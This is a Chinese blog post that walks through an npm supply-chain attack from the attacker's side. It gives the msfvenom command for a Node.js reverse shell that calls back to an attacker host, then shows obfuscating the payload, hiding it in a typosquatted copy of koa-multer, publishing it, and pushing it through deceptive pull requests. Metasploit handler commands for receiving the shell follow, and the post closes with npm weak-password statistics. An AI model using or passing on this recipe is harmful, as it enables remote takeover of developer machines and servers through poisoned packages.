本文首发于我的知乎专栏HackingSexy：zhuanlan.zhihu.com/p/43514079

TL,DR：

这篇文章讲述了从一个黑客的角度，以渗透前端项目为目标，从生成 payload，混淆，隐藏 payload，发布 npm，社会工程学提 PR，运行脚本，反向连接到攻击主机，最终主机拿到服务器 shell 的故事。

正片：

前端工程师的口头禅是啥？npm install！

这个命令从 npm 仓库中下载一堆从项目 package.json 中声明的依赖，下载完依赖后，再下载依赖中 package.json 声明的依赖，下载完依赖的依赖后，再下载依赖中 package.json 声明的依赖中的 package.json 声明的依赖，下载完依赖后…………

然后下了一堆你都不知道从哪里来的 npm 包。

前端工程师的另一个口头禅是什么？npm run dev！

嗯！界面显示 compile successful！很完美的一次编译！你觉得是时候展示真正的技术了！

此时，在网线的另一端，一个黑客微微一笑：又有一个肉鸡上线了。

这中间都发生了什么？

生成 Payload

经验丰富的金鱼佬都知道，要钓鱼，是肯定要先做鱼钩的。黑客也要钓鱼，鱼钩是啥？在黑客的世界里，有一个鱼钩店，叫做 msfvenom，专治各种款（架）式（构），各种型（语）号（言）的鱼（机器）。msfvenom 是 metasploit 的一部分，集成在了 Kali 系统里面。在 Kali 的官网，有现成的虚拟机镜像，下载了就能用。

在 Kali 的 Terminal 里输入：

msfvenom -l | grep node

可以列出所有支持 Node.js 的 payload。这相当于到店里问：老板！我要买鱼钩！要能钓 Node.js 的那种！老板：好嘞！要哪款？

在这里，我们选择 nodejs/shell_reverse_tcp，其实业界最常用的 payload 是 meterpreter，但是这款鱼钩还没上市：

如何生成我们的 payload 呢，输入：

msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.199.165 LPORT=5432 -o index.js

这里说一下配置的参数：

• -p nodejs/shell_reverse_tcp 指的是我们要用 nodejs/shell_reverse_tcp 这个 payload。
• LHOST=192.168.199.165 指的是攻击主机的 IP 地址，由于这次攻击是内网演示，所以用了内网 IP。公网攻击的话，就要配个公网 IP。
• LPORT=5432 攻击主机这边的监听端口，payload 运行后，被攻击方会尝试连接攻击主机的这个端口。
• -o index.js 意思是输出到 index.js 这个文件中。

敲完命令之后，我们可以在当前目录拿到一个名为 index.js 的 payload，也就是我们刚买到的鱼钩。payload 很小很小，只有 803 字节。用

cat index.js

命令，可以看到 payload 长什么样。

这时候警觉的前端就会跳出来讲：胸底，你这代码里又调用 cmd 又调用 /bin/sh，还把攻击 IP 和端口都暴露出来了，傻子才会运行你的代码哦？

别急嘛，好戏才刚刚开始。

混淆

传统的杀毒软件，是通过检测文件特定字符来确定病毒特征的，而通过修改特征码绕过杀毒软件的检测，我们称之为免杀。

而 JavaScript 的变化，简直比海贼王里的路飞还要伸缩自如。

举个例子，一行简单的代码：

alert(1)

用 jsfuck 能把它变得连老妈都认不出来：

[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()
复制代码

当然我们不用 jsfuck，因为混淆过后的代码太大了。

前端喜欢用 UglifyJS 来压缩代码，但在这场景下，也许不是最优解。我们用 JavaScript Obfuscator Tool。

复制 payload，打开 obfuscator.io/ ，粘贴，根据你的口味选择需要添加的混淆方法，点击 Obfuscate，一道菜就完成了。

现在已经没有人类能读懂这段代码了，混淆任务完成。

隐藏 payload

npm 是共产主义的大粮仓，任何人都可以贡献自己的代码到 npm 上去。但是如何让别人下载我们的代码呢？这是一门高深的学问。

常规的思路是，做一个和正常 npm 包名字很像的包名，譬如 koa-multer，可以做一个 koa_multer，然后总有一些人会打错字，下载到包含 payload 的包。这是一个概率问题，下载 koa-multer 的总量越大，下载 koa_multer 的量也越大。

以 koa-multer 为例，我们先把代码 clone 下载下来。

git clone github.com/koa-modules…

把我们生成的 payload 复制到项目路径下，并在 index.js 中引入这个文件。

把 package.json 和 README.md 里所有的 koa-multer 改成 koa_multer，并在 package.json 的 files 声明 payload 的文件名，我们就做好了一个带有 payload 的 npm 包。

拿到这个包，就可以发布到 npm 源了：

npm publish

为了演示，我在本地搭了一个 npm 服务器。

可以看到这个包和正确的 koa-multer 几乎一样。如果不深究源码，前端不会发现自己下载了一个错误的包。

接下来要做的事情是，等。就像钓鱼一样，需要耐心。

这时候警觉的前端工程师会跳出来说：你这包一看就知道是坑人的，我肯定不会蠢到安装这种包！

别急，还有其他方法。

另一个思路是，做一个通用的 npm 包，譬如能 log 出五彩斑斓颜色的包，然后去给其他的开源项目提 PR：

我帮你修复了问题 XXX，还加上了彩色 logger 的功能！

我们是在给开源社区做贡献呐！

当然，警觉的人会拒绝这个 PR。但这也没关系，提的 PR 多了，总会有人上钩的。

一个 npm 包被伪造不是问题，一个恶意的 PR 被不知名的项目 Approve 也不是问题。就像一个请求不能叫攻击，但是几百万的请求打过来的时候，你就知道 DDOS 有多可怕。

黑客完全可以把下载 npm 包，伪造代码并发布这段逻辑自动化。之后，就不仅仅是 koa_multer 的问题了，你需要提防 koa-multe，multer-koa，koa-multer-middleware 等等各种奇奇怪怪的 npm 包，还要区分"_"和"-"的区别，当然，也不仅仅是 koa-multer 这个包，其他所有的包都可以如法炮制。

就算再警觉，再小心，总有你注意不到的地方。就像刀剑不入的阿喀琉斯，也会有脚后跟中箭的一天。

另外，大多数 npm 包都是层级依赖关系，你能确保你的 package.json 中不可能声明有木马的包，但是你能确保你所依赖的包，这些包的作者，也和你一样警觉，不会大意？

黑客准备

黑客这边，需要准备好 handler。

输入：

msfconsole

进入metasploit的控制台。然后输入：

use exploit/multi/handler

使用 handler 模块。并在 handler 模块中设置 payload，攻击主机 IP，攻击主机端口，并启动监听：

set payload nodejs/shell_reverse_tcp set LHOST 192.168.199.165 set LPORT 5432 run

如图，反向TCP监听已经成功启动：

肉鸡上线

这时候，小白鼠跑了 koa_multer 里的 demo 代码！

黑客这边，马上能获得这个 shell 的会话：

在这里，黑客获得了启动该 Node.js 程序的用户权限，可以执行任何该用户允许执行的命令。譬如查看操作系统，查看 CPU 型号………

sw_vers # 查看操作系统
sysctl -n machdep.cpu.brand_string # 查看操作系统

如果这个程序部署到了生产环境服务器，那么黑客将能获得这个服务器的shell权限。

内网渗透，脱裤，种马，导流……拿到 shell 真的可以为所欲为。

Done？

还没完呢，精彩还在后头。

npm 账号的弱口令问题

在 2017 年 7 月份，有人对 npm 的账号做了一次弱口令检测，检测结果是：

有弱口令问题账号所发布的 npm 包，占据了整站的 14%。

由于 npm 包的存在形式相互依赖，由这 14% 的包引发的安全问题，影响到其他的包，占据了整站的 54%。

那就意味着，你每 npm install 两次，就会有一次安装到不安全的包。这不是危言耸听。大名鼎鼎 koa.js，发布的密码是 "password"；react、gulp 等明星项目也不能幸免。下面列举一些其他受弱口令问题影响的 npm 包，相信总有你熟悉的名字：

1. debug
2. qs
3. yargs
4. request
5. chalk
6. form-data
7. cheerio
8. gulp
9. browserify
10. bower
11. mongoose
12. electron
13. normalize.css
14. mysql

npm 到现在都没发生过大规模的安全性问题，纯属是运气好。

所以，让我们祝愿 npm 永远幸运吧。

Note：本文旨在交流探讨，作者没有渗透过任何系统。如根据本文思想进行渗透，读者须自行承担风险和责任。作者不承担任何责任。

参考文档：

1. hackernoon.com/im-harvesti…
2. github.com/ChALkeR/not…